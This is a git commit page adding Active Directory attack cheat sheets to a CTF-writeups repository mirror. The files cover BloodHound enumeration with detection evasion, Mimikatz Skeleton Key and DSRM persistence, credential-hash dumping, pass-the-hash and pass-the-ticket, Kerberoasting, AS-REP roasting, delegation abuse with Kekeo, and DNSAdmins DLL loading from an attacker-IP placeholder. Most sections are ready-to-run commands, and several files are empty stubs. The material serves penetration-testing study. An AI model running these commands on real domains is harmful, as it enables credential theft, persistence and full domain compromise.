mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-23 20:43:03 +00:00
Add files via upload
This commit is contained in:
parent
bfdc48cc8f
commit
38f3d51121
14 changed files with 414 additions and 0 deletions
21
Active Directory/Domain Enumeration/Bloodhound.md
Normal file
21
Active Directory/Domain Enumeration/Bloodhound.md
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Domain Enumeration - Bloodhound
|
||||||
|
|
||||||
|
Bloodhound is useful for gathering AD entities , relationships , it uses graph theory for providing the capability of mapping shortest path for interesting thing , it can find interesting things like `Domain Admins` , it has built-in queries.
|
||||||
|
|
||||||
|
https://github.com/BloodHoundAD/BloodHound
|
||||||
|
|
||||||
|
## Sharphound
|
||||||
|
|
||||||
|
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||||
|
|
||||||
|
### Generate archive
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-BloodHound -CollectionMethod All
|
||||||
|
```
|
||||||
|
|
||||||
|
### Avoiding detection form Advanced Threat Analytics (ATA)
|
||||||
|
```
|
||||||
|
Invoke-BloodHound -CollectionMethod All -ExcludeDC
|
||||||
|
```
|
||||||
|
|
22
Active Directory/Domain Persistance/3-Skeleton Key.md
Normal file
22
Active Directory/Domain Persistance/3-Skeleton Key.md
Normal file
|
@ -0,0 +1,22 @@
|
||||||
|
# Domain Persistance - Skeleton key
|
||||||
|
|
||||||
|
A Skeleton key is like a malware that is injected into LSASS process of Domain controller (DC), for this to achieve we need to be a domain admin in order to perfrom this , doing this will create a master password for all accounts in a domain ,existing passwords for those account will still work, this attack is done through `mimikatz`. The master password will not change until DC is rebooted
|
||||||
|
|
||||||
|
## mimikatz.exe
|
||||||
|
|
||||||
|
```
|
||||||
|
privilege::debug
|
||||||
|
misc::skeleton
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Mimikatz powershell
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -Computer computername.domain
|
||||||
|
```
|
||||||
|
|
||||||
|
Then we can just switch to other user
|
||||||
|
|
||||||
|
```
|
||||||
|
Enter-PSSession -ComputerName computername -Credential
|
||||||
|
```
|
65
Active Directory/Domain Persistance/4-DSRM.md
Normal file
65
Active Directory/Domain Persistance/4-DSRM.md
Normal file
|
@ -0,0 +1,65 @@
|
||||||
|
# Domain Persistance - DSRM
|
||||||
|
|
||||||
|
Directory Service Restore Mode (DSRM) , every `Local Administrator` on Domain Controller `DC` is named `Administrator` account , this Administrator is called DSRM account and DSRM password is set when a DC is promoted.
|
||||||
|
|
||||||
|
So it is possible to perfrom `Pass The Hash` attack after extracting NTLM hash of Local Administrator account , local administrator password is just a backup password if something goes wrong ,usually local administrator isn't used by DC
|
||||||
|
|
||||||
|
## Using mimikatz.exe
|
||||||
|
```
|
||||||
|
privilege:debug (to see privileges)
|
||||||
|
token::elevate (to become NT AUTHORITY\SYSTEM)
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extracting Local Administrator password hash
|
||||||
|
```
|
||||||
|
lsadump::sam
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extracting Domain Administrator password hash
|
||||||
|
|
||||||
|
```
|
||||||
|
lsadump::lsa /patch
|
||||||
|
```
|
||||||
|
|
||||||
|
By default DSRM logon is disbaled , value is set to 0 , set the value to 2
|
||||||
|
|
||||||
|
```
|
||||||
|
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbos
|
||||||
|
```
|
||||||
|
|
||||||
|
if this entry doesn't exist , we can create it
|
||||||
|
|
||||||
|
```
|
||||||
|
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
Then
|
||||||
|
|
||||||
|
```
|
||||||
|
sekurlsa::pth /user:Administrator /domain:dominname /ntlm:ntlm_hash_of_local_admin
|
||||||
|
```
|
||||||
|
|
||||||
|
## Using mimikatz powershell
|
||||||
|
|
||||||
|
This is for local administrator
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam""' -Computername computername
|
||||||
|
```
|
||||||
|
|
||||||
|
This is for domain admin
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername computername
|
||||||
|
```
|
||||||
|
|
||||||
|
now performing pass the hash
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:domainname /user:Administrator /ntlm:local_admin_hash /run:powershell.exe"'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
Enter-PSsession -Computername computer
|
||||||
|
```
|
2
Active Directory/Domain Persistance/5-Custom SSP.md
Normal file
2
Active Directory/Domain Persistance/5-Custom SSP.md
Normal file
|
@ -0,0 +1,2 @@
|
||||||
|
# Domain Persistance - Custom SSP
|
||||||
|
SSP stands for Security Support Provider
|
1
Active Directory/Domain Persistance/6-ACLs (pending).md
Normal file
1
Active Directory/Domain Persistance/6-ACLs (pending).md
Normal file
|
@ -0,0 +1 @@
|
||||||
|
# Domain Persistance - ACLs
|
|
@ -0,0 +1,2 @@
|
||||||
|
# Domain Persistance - Security Descriptor
|
||||||
|
|
|
@ -0,0 +1,54 @@
|
||||||
|
# Domain Privilege Escalation - Kerberoasting
|
||||||
|
|
||||||
|
Kerberoasting isn't an exploit or an attack it's abusing feature of windows for authenticating users in AD ,
|
||||||
|
|
||||||
|
## Steps in Kerberos
|
||||||
|
|
||||||
|
- User logs on with username & password.
|
||||||
|
|
||||||
|
- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).
|
||||||
|
|
||||||
|
- The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
|
||||||
|
|
||||||
|
- **The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.**
|
||||||
|
|
||||||
|
- **The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP).**
|
||||||
|
|
||||||
|
- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
|
||||||
|
|
||||||
|
- Optional mutual authentication is done by service that the user provides TGS ticket to
|
||||||
|
|
||||||
|
## Kerberoasting
|
||||||
|
|
||||||
|
Ticket Granting Service `TGS` has a server portion which is encrypted with service account's NTLM hash , we can request a TGS for a particular service when we want to connect to it and then cracking the hash , service accounts are usually ignored as passwords aren't changed and they might have some privileges. This can be used to create silver tickets.
|
||||||
|
|
||||||
|
In order to do this we need to have a valid domain user and there must be a SPN attached to a user (service account)
|
||||||
|
|
||||||
|
## PowerView commands
|
||||||
|
|
||||||
|
### Finding usser accounts used as a service account
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-NetUser -SPN
|
||||||
|
```
|
||||||
|
|
||||||
|
### Request a TGS
|
||||||
|
```
|
||||||
|
Request -SPNTicket
|
||||||
|
```
|
||||||
|
|
||||||
|
## AD Module
|
||||||
|
|
||||||
|
### Finding usser accounts used as a service account
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
|
||||||
|
```
|
||||||
|
|
||||||
|
### Request a TGS
|
||||||
|
```
|
||||||
|
Add-Type -AssemblyName System.IdentityModel
|
||||||
|
|
||||||
|
New-Object System.IdentityModel.Toekns.KerberosRequestorSecurityToken -ArgumentList "MSSQLSVC/computername.domainname"
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,54 @@
|
||||||
|
# Domain Privilege Escalation - AS REP Roasting
|
||||||
|
|
||||||
|
If pre-authentication is disabled on a user account or a service account , meaning that UserAccountControl settings have `Don not require Kerberos preauthentication`, then it is possbile to request a TGT for that user account without any password but a valid username is required
|
||||||
|
|
||||||
|
## Steps in Kerberos
|
||||||
|
|
||||||
|
- **User logs on with username & password.**
|
||||||
|
|
||||||
|
- **Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).**
|
||||||
|
|
||||||
|
- **The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.**
|
||||||
|
|
||||||
|
- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.
|
||||||
|
|
||||||
|
- The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP)
|
||||||
|
|
||||||
|
- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
|
||||||
|
|
||||||
|
- Optional mutual authentication is done by service that the user provides TGS ticket to
|
||||||
|
|
||||||
|
## PowerView (dev)
|
||||||
|
|
||||||
|
### Enumerating accounts with Kerberos preauth disabled
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-DomainUser -PreauthNotRequired -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
### Request encrypted AS-REP for offline brute force
|
||||||
|
|
||||||
|
## AD Module
|
||||||
|
|
||||||
|
### Enumerating accounts with Kerberos preauth disabled
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
|
||||||
|
```
|
||||||
|
|
||||||
|
## ASREP Roast
|
||||||
|
|
||||||
|
https://github.com/HarmJ0y/ASREPRoast
|
||||||
|
|
||||||
|
|
||||||
|
### Request encrypted AS-REP for offline brute force
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-ASREPHash -Username user -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
### To enumerate all users with kerberos preauth disable and request a hash
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-ASREPRoast -Verbose
|
||||||
|
```
|
|
@ -0,0 +1,2 @@
|
||||||
|
# Domain Privilege Escalation - Set SPN
|
||||||
|
|
126
Active Directory/Domain Privilege Escalation/4-Delegation.md
Normal file
126
Active Directory/Domain Privilege Escalation/4-Delegation.md
Normal file
|
@ -0,0 +1,126 @@
|
||||||
|
# Domain Privilege Escalation - Delegation
|
||||||
|
|
||||||
|
Kerberos delegation allows to re use user's credentials to access resources hosted on a different server , this is done in mult-tier service where kerberos double hop is required
|
||||||
|
|
||||||
|
Delegation could look like this where a user authenticates to web server , web server makes requests to database server but not as web service account but as the user account (that has authenticated)
|
||||||
|
|
||||||
|
## Steps in delegation
|
||||||
|
|
||||||
|
- User provides credentials to domain controller (DC)
|
||||||
|
|
||||||
|
- DC returns a Ticket Granting Ticket (TGT)
|
||||||
|
|
||||||
|
- User requests a Ticket Granting Service (TGS) for the service he wants to connects , let's say web service
|
||||||
|
|
||||||
|
- User sends TGT and TGS to web server
|
||||||
|
|
||||||
|
- Web service account uses the user's TGT to request to another service to use , let's assume database service
|
||||||
|
|
||||||
|
- Web server's account connects to database server as the user
|
||||||
|
|
||||||
|
## Types of delegations
|
||||||
|
|
||||||
|
There are 2 types of delegations
|
||||||
|
|
||||||
|
- Unconstrained Delegation
|
||||||
|
- Constratined Delegation
|
||||||
|
|
||||||
|
## Unconstrained Delegation
|
||||||
|
|
||||||
|
Unconstrained delegation allows first hop server to request access to any service on any computer in domain
|
||||||
|
|
||||||
|
The way this delegation works is that domain controller places Ticket Granting Ticket (TGT) in Ticket Granting Service (TGS) , TGT is extracted from the TGS and TGT is stored in LSASS by the server , this way server can reuse user's TGT to access any resource in the domain as the user.
|
||||||
|
|
||||||
|
# PowerView
|
||||||
|
|
||||||
|
### Discover domain computers which have unconstrained delegation
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-NetComputer -UnConstrained
|
||||||
|
```
|
||||||
|
|
||||||
|
## AD Module
|
||||||
|
```
|
||||||
|
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||||
|
Get-ADUser -Filter {TrustedForDelegation -e $True}
|
||||||
|
```
|
||||||
|
|
||||||
|
# Mimikatz
|
||||||
|
|
||||||
|
After finding that which computer or service has unconstrained delegation enabled , we will need to make a domain admin login to that service/computer and with administrative privileges on that computer we can use mimikatz to list the avaiable tickets in the session , as in unconstrained delegation , TGT will be loaded in LSASS so we can use that to get domain admin
|
||||||
|
|
||||||
|
## Check if any domain admin token is available
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
|
||||||
|
```
|
||||||
|
|
||||||
|
By running this command we can see a administrator token so use the command below to do `ptt` pass the ticket to load it into the current sessions
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"kerberos::ptt location_of_the_ticket(C:\Users\user\Documents\ticket_something)"'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Constrained Delegation
|
||||||
|
|
||||||
|
Constrained delegation allows first hop to request access to specific services on specific computers. It allows access only to specified services on specified computers as a user.
|
||||||
|
|
||||||
|
It doesn't use kerberos when authenticating the user ,when a user authenticates to a web service , and the user requests something from database ,web server makes a requests using the authorized user account, to impersonate the user , `Service For user (S4U) extension is used ` that has two extensions
|
||||||
|
|
||||||
|
- Service for user to self (S4U2Self) , it allows a service to obtain forwardable TGS to itself on behalf of a user. This must have `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION`
|
||||||
|
- Service for User to proxy (S4U2Proxy) , it allows a service to obtain a TGS for second service on behalf of authorized user. This is controlled by `msDS-AllowedToDelegateTo` attribute that contains list of SPNs to which user tokens can be forwarded
|
||||||
|
|
||||||
|
## Steps in constrained delegation
|
||||||
|
|
||||||
|
- A user authenticates to web serivce using non kerberos authentication mechanism.
|
||||||
|
|
||||||
|
- Web service requests a ticket from DC/KDC for the user's account without supplying the password as web service account.
|
||||||
|
|
||||||
|
- KDC checks if web service account has `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` attribute and also if the user isn't blocked for delegation , then it forwards a S4U2Self ticket for the user's account.
|
||||||
|
|
||||||
|
- Service then passes this ticket back to KDC and a request a service ticket for the another service let's say Database service.
|
||||||
|
|
||||||
|
- KDC checks if `msDS-AllowedToDelegateTo` is on the web service account ,if service is listed then it will return the token for database service (S4U2proxy).
|
||||||
|
|
||||||
|
- Web service can now authenticate to database service as the user's TGS to that service.
|
||||||
|
|
||||||
|
|
||||||
|
### PowerView (dev)
|
||||||
|
|
||||||
|
#### Enumerate users and computers with constrained delegations enabled
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-DomainUser -TrustedToAuth
|
||||||
|
Get-DomainComputer -TrustedToAuth
|
||||||
|
```
|
||||||
|
|
||||||
|
### AD Module
|
||||||
|
|
||||||
|
#### Enumerate users and computers with constrained delegations enabled
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -Properties msDS-AllowedToDeleagteTo}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Kekeo.exe
|
||||||
|
|
||||||
|
### Using `asktgt` we will first get the TGT of the service account that is allowed to delegate
|
||||||
|
|
||||||
|
```
|
||||||
|
tgt::ask /user:username /domain:domainname /rc4:ntlm_hash_of_user
|
||||||
|
```
|
||||||
|
|
||||||
|
### Using `s4u` , we request a TGS as any user on the service which we have permission to delegate
|
||||||
|
|
||||||
|
```
|
||||||
|
tgs::s4u /tgt:TGS_Ticket_of_service_account /user:Administrator@domainname /service:mssql
|
||||||
|
```
|
||||||
|
|
||||||
|
### Now using mimikatz , we can use pass the ticket to load the ticket in powershell session
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"kerebros::ptt administrator_ticket"'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
39
Active Directory/Domain Privilege Escalation/5-DNSAdmin.md
Normal file
39
Active Directory/Domain Privilege Escalation/5-DNSAdmin.md
Normal file
|
@ -0,0 +1,39 @@
|
||||||
|
# Domain Enumeration - DNSAdmins
|
||||||
|
|
||||||
|
|
||||||
|
Members of `DNSAdmins` could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA)
|
||||||
|
|
||||||
|
## Powerview
|
||||||
|
|
||||||
|
### Enumerate members of DNSAdmins group
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-NetGroupMember -GroupName "DNSAdmins"
|
||||||
|
```
|
||||||
|
|
||||||
|
## AD Module
|
||||||
|
|
||||||
|
### Enumerate members of DNSAdmins group
|
||||||
|
|
||||||
|
```
|
||||||
|
Get-ADGroupMember -Identity DNSAdmins
|
||||||
|
```
|
||||||
|
|
||||||
|
### Configure DLL using `dnscmd.exe`
|
||||||
|
```
|
||||||
|
dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
### Restart dns service
|
||||||
|
|
||||||
|
```
|
||||||
|
sc.exe stop dns
|
||||||
|
sc.exe sart dns
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Or alternatively follow this
|
||||||
|
|
||||||
|
|
||||||
|
https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
|
3
Active Directory/Enumeration/4-ACL (pending).md
Normal file
3
Active Directory/Enumeration/4-ACL (pending).md
Normal file
|
@ -0,0 +1,3 @@
|
||||||
|
# Domain Enumeration - Access Control List
|
||||||
|
|
||||||
|
##
|
|
@ -0,0 +1,21 @@
|
||||||
|
# Forest Attacks - Cross Forest Attacks
|
||||||
|
DCShaodw temporarliy registers a new domain controller in the domain and uses it to push attributes like SIDHistory , SPNs and etc without leaving change logs for objects.
|
||||||
|
|
||||||
|
New domain controller is registered by modifying configuration , SPNs of existing computer object and couple of RPC services
|
||||||
|
|
||||||
|
|
||||||
|
## Mimikatz
|
||||||
|
|
||||||
|
We need two instances of mimikatz for `DCShadow`
|
||||||
|
|
||||||
|
```
|
||||||
|
!+
|
||||||
|
!processtoken
|
||||||
|
lsadump::dcshadow /objec:rootuser /attribute:Description /value="Hello from DCShadow"
|
||||||
|
```
|
||||||
|
|
||||||
|
And the second instance with domain admin privileges
|
||||||
|
|
||||||
|
```
|
||||||
|
lsadump::dcshadow /push
|
||||||
|
```
|
|
@ -0,0 +1,2 @@
|
||||||
|
# Forest Attacks - Forest Persistence DC Shadow
|
||||||
|
|
Loading…
Reference in a new issue